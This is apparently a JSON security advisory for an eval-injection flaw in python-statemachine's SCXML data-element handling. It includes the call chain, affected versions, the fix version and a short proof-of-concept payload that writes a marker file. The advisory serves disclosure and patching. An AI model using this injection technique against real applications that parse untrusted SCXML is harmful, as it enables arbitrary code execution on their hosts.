{"id":"PYSEC-2026-506","summary":"python-statemachine SCXML \u003cdata expr\u003e Eval Injection","details":"### Summary\n\npython-statemachine 3.1.2 evaluates `\u003cdata expr=\"...\"\u003e` attributes in SCXML documents using Python's `eval()`. Any application that passes attacker-controlled SCXML content to `SCXMLProcessor` is vulnerable to arbitrary code execution in the context of the hosting process.\n\n### Details\n\n`SCXMLProcessor.parse_scxml_file()` processes SCXML documents and evaluates `\u003cdata\u003e` element `expr` attributes via the following call chain:\n\n```\nSCXMLProcessor.parse_scxml_file()\nSCXMLProcessor.process_definition()\n create_datamodel_action_callable()\n_create_dataitem_callable()\n_eval()\neval()\n ```\n\n`_eval()` calls Python's built-in `eval()` directly on the expression string without sandboxing or restriction.\n\n### PoC\n\n```\n1. Install:\n   pip install python-statemachine==3.1.2\n\n2. Create an SCXML file containing:\n   \u003cdata id=\"x\" expr=\"__import__('pathlib').Path('marker.txt').write_text('pwned')\"/\u003e\n\n 3. Run:\n   SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)\n   SCXMLProcessor.start()\n \n4. During start(), \u003cdata expr\u003e reaches _eval(), which calls eval().\n\n5. Result:\n   data_marker_before_start: False\n   data_marker_after_start: True\n   success: True\n```\n\n### Impact\n\nThis is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.","aliases":["CVE-2026-47103","GHSA-v4jc-pm6r-3vj8"],"modified":"2026-07-01T20:23:03.302193Z","published":"2026-06-29T11:50:52.079977Z","references":[{"type":"WEB","url":"https://github.com/fgmacedo/python-statemachine/security/advisories/GHSA-v4jc-pm6r-3vj8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47103"},{"type":"PACKAGE","url":"https://github.com/fgmacedo/python-statemachine"},{"type":"WEB","url":"https://github.com/fgmacedo/python-statemachine/releases/tag/v3.2.0"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/python-statemachine-rce-via-scxml-eval-injection"},{"type":"PACKAGE","url":"https://pypi.org/project/python-statemachine"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-v4jc-pm6r-3vj8"}],"affected":[{"package":{"name":"python-statemachine","ecosystem":"PyPI","purl":"pkg:pypi/python-statemachine"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.0.0"},{"fixed":"3.2.0"}]}],"versions":["3.0.0","3.1.0","3.1.1","3.1.2"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/python-statemachine/PYSEC-2026-506.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"}]}